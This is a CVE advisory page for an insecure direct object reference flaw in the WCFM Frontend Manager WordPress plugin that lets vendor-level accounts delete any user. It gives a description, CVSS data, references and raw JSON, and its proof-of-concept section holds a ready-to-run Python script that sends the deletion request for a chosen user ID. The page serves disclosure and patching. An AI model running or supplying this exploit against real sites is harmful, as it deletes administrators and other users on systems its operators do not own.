Security Vulnerability Report
CVE-2026-2554 CVSS 8.1 HIGH

Published: 2026-05-02 14:16:18
Last Modified: 2026-05-05 19:15:06

Description

The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WCFM – Frontend Manager for WooCommerce <= 6.7.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_delete_user(target_url, attacker_cookie, target_user_id):
    """
    Exploit for CVE-2026-2554 IDOR vulnerability.
    Deletes a user by ID using a low-privilege vendor account.
    """
    # The endpoint is typically wp-admin/admin-ajax.php
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # Payload data
    data = {
        'action': 'wcfm_delete_wcfm_customer',
        'customerid': target_user_id
    }

    # Headers and Cookies
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    cookies = {
        'wordpress_logged_in_xxx': attacker_cookie  # Replace with actual cookie
    }

    try:
        response = requests.post(endpoint, data=data, headers=headers, cookies=cookies)
        if response.status_code == 200:
            print(f"[+] Request sent to delete user ID: {target_user_id}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


# Example usage
# exploit_delete_user('http://target-site.com', 'attacker_cookie_value', '1')
```

References

- https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-customer.php#L386
- https://plugins.trac.wordpress.org/changeset/3483695/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/21e397a4-0b32-4b13-a46b-c465acea0796?source=cve
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-2554", "sourceIdentifier": "[email protected]", "published": "2026-05-02T14:16:17.707", "lastModified": "2026-05-05T19:15:06.200", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-customer.php#L386", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3483695/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21e397a4-0b32-4b13-a46b-c465acea0796?source=cve", "source": "[email protected]"}]}}
```